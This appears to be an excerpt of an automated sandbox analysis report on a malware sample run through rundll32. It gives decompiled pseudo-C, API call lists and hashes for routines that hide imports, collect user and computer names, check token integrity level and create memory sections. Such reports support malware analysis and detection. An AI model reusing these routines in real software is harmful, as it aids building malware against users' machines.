0x00a16d81
0x00a16d8b
0x00a16d8d
0x00a16d8e
0x00a16d91
0x00a16dad
0x00a16db3
0x00a16db7
0x00a16e05
0x00a16db9
0x00a16dc6
0x00a16dd6
0x00a16dde
0x00a16df0
0x00a16df4
0x00000000
0x00000000
0x00a16de0
0x00a16de3
0x00a16de8
0x00a16dea
0x00a16dea
0x00a16dc8
0x00a16dca
0x00a16df6
0x00a16df7
0x00a16df7
0x00a16dc6
0x00a16e0c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00A17115,?,00000001,?), ref: 00A16D56
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A16D6C
_snwprintf.NTDLL ref: 00A16D91
CreateFileMappingW.KERNELBASE(000000FF,00A1D234,00000004,00000000,00001000,?), ref: 00A16DAD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A17115,?), ref: 00A16DBF
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A16DD6
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A17115), ref: 00A16DF7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A17115,?), ref: 00A16DFF

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: e8bde73d7972a076110ecbb2705fef05ca5d979d7696a645e6604d5f5c368cff
Instruction ID: 333f365a31adb055f711921aa686a90541fac5a0270ffced7850f67d23feffa4
Opcode Fuzzy Hash: e8bde73d7972a076110ecbb2705fef05ca5d979d7696a645e6604d5f5c368cff
Instruction Fuzzy Hash: 5B21E476680204FBD711EFA8DC05FDE37B9AB48750F254160F601EB1D0D770D9428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6FC41792(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x6fc4179b
0x6fc417a1
0x6fc417a8
0x6fc417ab
0x6fc418ac
0x6fc418b1
0x6fc418b1
0x6fc417b2
0x6fc417b5
0x6fc417ba
0x6fc417bd
0x6fc418ab
0x00000000
0x6fc418ab
0x6fc417c4
0x6fc417c4
0x6fc417c8
0x6fc417d0
0x6fc417d3
0x00000000
0x00000000
0x6fc417d9
0x6fc417e8
0x6fc417ed
0x6fc417ef
0x6fc417f2
0x6fc417f7
0x6fc41803
0x6fc41803
0x6fc41806
0x6fc4180a
0x6fc41890
0x6fc41890
0x6fc41893
0x6fc41898
0x6fc4189b
0x00000000
0x00000000
0x6fc418aa
0x00000000
0x6fc418aa
0x6fc41814
0x6fc41817
0x00000000
0x6fc41819
0x6fc41819
0x6fc41822
0x6fc41837
0x6fc41839
0x6fc41830
0x6fc41830
0x6fc41830
0x6fc4181b
0x6fc4181b
0x6fc4181b
0x6fc4183e
0x6fc4183e
0x6fc41841
0x6fc41843
0x6fc41843
0x6fc4184b
0x6fc41853
0x6fc41856
0x00000000
0x00000000
0x6fc4185a
0x6fc4185c
0x6fc4186a
0x6fc4186f
0x6fc4186f
0x6fc41878
0x6fc4187b
0x6fc4187e
0x6fc41882
0x00000000
0x6fc41884
0x6fc4188d
0x6fc4188d
0x00000000
0x6fc4188d
0x6fc41886
0x6fc41886
0x00000000
0x6fc41886
0x6fc417fb
0x6fc417fd
0x00000000
0x00000000
0x00000000
0x6fc417fd
0x6fc418a3
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 6FC417C8
lstrlenA.KERNEL32(00000002), ref: 6FC417DE
memset.NTDLL ref: 6FC417E8
GetProcAddress.KERNEL32(?,00000002), ref: 6FC4184B
lstrlenA.KERNEL32(-00000002), ref: 6FC41860
memset.NTDLL ref: 6FC4186A

Strings

~, xrefs: 6FC418A3

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 3c34590d0bd13bd7887576fb1c4b29a3fdefa31b703c56308b1e69d43dc6abd5
Instruction ID: 873deedac69ad972d8eb0eb7db8a8ea995707a9ddf21b36682c88a7130d9a749
Opcode Fuzzy Hash: 3c34590d0bd13bd7887576fb1c4b29a3fdefa31b703c56308b1e69d43dc6abd5
Instruction Fuzzy Hash: 8E318D71A01605AFDB16CF5DC980BAAB7B4BF44300F224129ED95EB240F730EA29CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A1707F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00A1707F(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00A1286D();
				if(_t27 != 0) {
					_t77 =  *0xa1d214; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xa1d214 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xa1d134(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00A1A362( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xa1d230; // 0x4a6a5a8
					_push(0xa1d238);
					_push(1);
					_t7 = _t32 + 0xa1e5bc; // 0x4d283a53
					 *0xa1d234 = 0xc;
					 *0xa1d23c = 0;
					L00A17A28();
					_t36 = E00A16D4A(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00A18B98(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00A1550F(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xa1d230; // 0x4a6a5a8
								_t18 = _t64 + 0xa1e916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xa1d284 = _t87;
						}
						_t38 = E00A17890();
						 *0xa1d228 =  *0xa1d228 ^ 0xe8fa7dd7;
						 *0xa1d278 = _t38;
						_t39 = E00A1550F(0x60);
						__eflags = _t39;
						 *0xa1d2d4 = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xa1d2d4; // 0x5489630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xa1d2d4; // 0x5489630
							 *_t56 = 0xa1e882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xa1d1f0, _t84, 0x52);
							__eflags = _t42;
							 *0xa1d270 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xa1d214; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xa1d230; // 0x4a6a5a8
								_t19 = _t76 + 0xa1e212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xa1c2bf);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00A18B98( ~_v8 &  *0xa1d228, 0xa1d00c); // executed
								_t84 = E00A14D8D(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00A19848(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00A19C23(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00A1524A(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xa1d130();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00A18134(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00a1707f
0x00a1708a
0x00a1708d
0x00a17090
0x00a17093
0x00a1709a
0x00a1709c
0x00a170a8
0x00a170aa
0x00a170aa
0x00a170b3
0x00a170bb
0x00a170be
0x00a170d8
0x00a170dd
0x00a170de
0x00a170e0
0x00a170e5
0x00a170ea
0x00a170ec
0x00a170f3
0x00a170fd
0x00a17103
0x00a17110
0x00a17117
0x00a1711c
0x00a1711c
0x00a17125
0x00a1714e
0x00a17151
0x00a1715e
0x00a17165
0x00a17171
0x00a17173
0x00a17175
0x00a1717a
0x00a17180
0x00a17186
0x00a1718c
0x00a1718f
0x00a17194
0x00a1719c
0x00a1719e
0x00a1719e
0x00a171a1
0x00a171a1
0x00a171a7
0x00a171ac
0x00a171b4
0x00a171b9
0x00a171be
0x00a171c0
0x00a171c5
0x00a171f4
0x00a171c7
0x00a171cc
0x00a171d1
0x00a171d6
0x00a171dd
0x00a171e3
0x00a171e8
0x00a171ee
0x00a171ee
0x00a171f5
0x00a171f7
0x00a17206
0x00a1720c
0x00a1720e
0x00a17213
0x00a1723f
0x00a17215
0x00a17215
0x00a1721b
0x00a17228
0x00a1722e
0x00a1722e
0x00a17236
0x00a17238
0x00a17240
0x00a17242
0x00a17249
0x00a17256
0x00a17260
0x00a17262
0x00a17264
0x00000000
0x00000000
0x00a17266
0x00a1726b
0x00a1726d
0x00a17274
0x00a17278
0x00a1727b
0x00a17290
0x00a17294
0x00a17299
0x00000000
0x00a17299
0x00a1727d
0x00a1727f
0x00000000
0x00000000
0x00a17281
0x00a1728a
0x00a1728c
0x00a1728e
0x00000000
0x00000000
0x00000000
0x00a1728e
0x00a17271
0x00a17271
0x00a17242
0x00a17127
0x00a17127
0x00a1712c
0x00a1729b
0x00a1729f
0x00a172a7
0x00a172a7
0x00000000
0x00a1729f
0x00a17132
0x00a17135
0x00a17135
0x00a17137
0x00a1713a
0x00a17142
0x00a17149
0x00000000
0x00a172af
0x00a172af
0x00a172b2
0x00a172b7
0x00a172b7

APIs

Part of subcall function 00A1286D: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A17098,00000000,00000000,00000000,?,?,?,?,?,00A1258B,?,00000001), ref: 00A1287C

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00A1D238,00000000), ref: 00A17103
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00A1258B,?,00000001), ref: 00A1711C
wsprintfA.USER32 ref: 00A1719C
memset.NTDLL ref: 00A171CC
RtlInitializeCriticalSection.NTDLL(054895F0), ref: 00A171DD
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00A17206
wsprintfA.USER32 ref: 00A17236

Part of subcall function 00A18B98: GetUserNameW.ADVAPI32(00000000,00A1725B), ref: 00A18BCF
Part of subcall function 00A18B98: RtlAllocateHeap.NTDLL(00000000,00A1725B), ref: 00A18BE6
Part of subcall function 00A18B98: GetUserNameW.ADVAPI32(00000000,00A1725B), ref: 00A18BF3
Part of subcall function 00A18B98: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A1725B,?,?,?,?,?,00A1258B,?,00000001), ref: 00A18C14
Part of subcall function 00A18B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A18C3B
Part of subcall function 00A18B98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A18C4F
Part of subcall function 00A18B98: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A18C5C
Part of subcall function 00A18B98: HeapFree.KERNEL32(00000000,00000000), ref: 00A18C7A

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 9ac988f174e350e1a803f2d0b4f03292743496e72aa61aeb7de7b3f17358081d
Instruction ID: 1c61b56a5d9870899976f8d53e6f52d6b64b91a782ceb32fc92cdc12836504cd
Opcode Fuzzy Hash: 9ac988f174e350e1a803f2d0b4f03292743496e72aa61aeb7de7b3f17358081d
Instruction Fuzzy Hash: 6351D0B1D44225EBDB21DBE8DD85BEE73BAAB48710F144115F805EB290D774DD828BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A16E28, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A16E28(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xa1d214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00A1550F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00A1A07B(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00a16e35
0x00a16e3c
0x00a16e43
0x00a16e57
0x00a16e62
0x00a16e7a
0x00a16e87
0x00a16e8a
0x00a16e8f
0x00a16e9a
0x00a16e9e
0x00a16ead
0x00a16eb1
0x00a16ecd
0x00a16ecd
0x00a16ed1
0x00a16ed1
0x00a16ed6
0x00a16eda
0x00a16ee0
0x00a16ee1
0x00a16ee8
0x00a16eee

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A16E5A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00A16E7A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00A16E8A
CloseHandle.KERNEL32(00000000), ref: 00A16EDA

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00A16EAD
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A16EB5
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A16EC5

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: a66fbba8031eadded38bfe5f56b34d94b061845b5d803be69c5c5876d7fde1c4
Instruction ID: 279acb653113110a30d01612fcb18969c6e0cfe394af03788d0cf08bef038dee
Opcode Fuzzy Hash: a66fbba8031eadded38bfe5f56b34d94b061845b5d803be69c5c5876d7fde1c4
Instruction Fuzzy Hash: 3721597990021DFFEB00DFE0DD84EEEBBB9EB08304F0040A5E611A21A1C7718E46EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6FC41314(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E6FC41BD2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x6fc44150 + 0x6fc45014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x6fc44150 + 0x6fc450dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E6FC419CF(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x6fc44150 + 0x6fc450ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x6fc44150 + 0x6fc450ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x6fc44150 + 0x6fc45114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x6fc44150 + 0x6fc4512a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E6FC41C22(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6fc41323
0x6fc41327
0x6fc413e9
0x6fc4132d
0x6fc41345
0x6fc41354
0x6fc4135b
0x6fc4135f
0x6fc41362
0x6fc413e1
0x6fc413e2
0x6fc41364
0x6fc41371
0x6fc41375
0x6fc41378
0x00000000
0x6fc4137a
0x6fc41387
0x6fc4138b
0x6fc4138e
0x00000000
0x6fc41390
0x6fc4139d
0x6fc413a1
0x6fc413a4
0x00000000
0x6fc413a6
0x6fc413b3
0x6fc413b7
0x6fc413ba
0x00000000
0x6fc413bc
0x6fc413c2
0x6fc413c7
0x6fc413ce
0x6fc413d5
0x6fc413d8
0x00000000
0x6fc413da
0x6fc413dd
0x6fc413dd
0x6fc413d8
0x6fc413ba
0x6fc413a4
0x6fc4138e
0x6fc41378
0x6fc41362
0x6fc413f7

APIs

Part of subcall function 6FC41BD2: HeapAlloc.KERNEL32(00000000,?,6FC41FD0,?,00000000,00000000,?,6FC41069), ref: 6FC41BDE

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,6FC4127C,?,?,?,00000002,?,?,?), ref: 6FC41339
GetProcAddress.KERNEL32(00000000,?), ref: 6FC4135B
GetProcAddress.KERNEL32(00000000,?), ref: 6FC41371
GetProcAddress.KERNEL32(00000000,?), ref: 6FC41387
GetProcAddress.KERNEL32(00000000,?), ref: 6FC4139D
GetProcAddress.KERNEL32(00000000,?), ref: 6FC413B3

Part of subcall function 6FC41C22: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,00000002), ref: 6FC41C7F
Part of subcall function 6FC41C22: memset.NTDLL ref: 6FC41CA1

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 4950d864d918e3c701ca3424d280f74b3ba3ade2503d650bed70c6e39e34910d
Instruction ID: c37a20d59afacb489acf962512ba4e9a0d99eb7d26464d1fd45c05b1292c6c45
Opcode Fuzzy Hash: 4950d864d918e3c701ca3424d280f74b3ba3ade2503d650bed70c6e39e34910d
Instruction Fuzzy Hash: 562128B150070A9FDB01EFAEC884E9A7BFCFB45254B104526EA55C7601E730E9198BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A14B22, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A14B22() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t54;

				_v12 = 0;
				_t23 = E00A194F1(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xa1d230; // 0x4a6a5a8
				_t4 = _t24 + 0xa1ed80; // 0x5489328
				_t5 = _t24 + 0xa1ed28; // 0x4f0053
				_t26 = E00A18393( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xa1d230; // 0x4a6a5a8
						_t11 = _t32 + 0xa1ed74; // 0x548931c
						_t48 = _t11;
						_t12 = _t32 + 0xa1ed28; // 0x4f0053
						_t54 = E00A17502(_t11, _t12, _t11);
						_t58 = _t54;
						if(_t54 != 0) {
							_t35 =  *0xa1d230; // 0x4a6a5a8
							_t13 = _t35 + 0xa1edbe; // 0x30314549
							_t37 = E00A163EE(_t48, _t58, _v8, _t54, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t60 =  *0xa1d214 - 6;
								if( *0xa1d214 <= 6) {
									_t42 =  *0xa1d230; // 0x4a6a5a8
									_t15 = _t42 + 0xa1ebda; // 0x52384549
									E00A163EE(_t48, _t60, _v8, _t54, _t15, 0x13);
								}
							}
							_t38 =  *0xa1d230; // 0x4a6a5a8
							_t17 = _t38 + 0xa1edb8; // 0x5489360
							_t18 = _t38 + 0xa1ed90; // 0x680043
							_t45 = E00A163AB(_v8, 0x80000001, _t54, _t18, _t17);
							HeapFree( *0xa1d1f0, 0, _t54);
						}
					}
					HeapFree( *0xa1d1f0, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00A172B8(_t53);
				}
				return _t45;
			}

0x00a14b32
0x00a14b35
0x00a14b3c
0x00a14b3e
0x00a14b3e
0x00a14b41
0x00a14b46
0x00a14b4d
0x00a14b5a
0x00a14b5f
0x00a14b63
0x00a14b71
0x00a14b7f
0x00a14b83
0x00a14c14
0x00a14c14
0x00a14b89
0x00a14b89
0x00a14b8e
0x00a14b8e
0x00a14b95
0x00a14ba1
0x00a14ba3
0x00a14ba5
0x00a14ba7
0x00a14bae
0x00a14bb9
0x00a14bc0
0x00a14bc2
0x00a14bc9
0x00a14bcb
0x00a14bd2
0x00a14bdd
0x00a14bdd
0x00a14bc9
0x00a14be2
0x00a14be7
0x00a14bee
0x00a14c0c
0x00a14c0e
0x00a14c0e
0x00a14ba5
0x00a14c20
0x00a14c20
0x00a14c22
0x00a14c27
0x00a14c29
0x00a14c29
0x00a14c34

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05489328,00000000,?,747DF710,00000000,747DF730), ref: 00A14B71
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05489360,?,00000000,30314549,00000014,004F0053,0548931C), ref: 00A14C0E
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A19CB1), ref: 00A14C20

Strings

Uxt, xrefs: 00A14B77

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
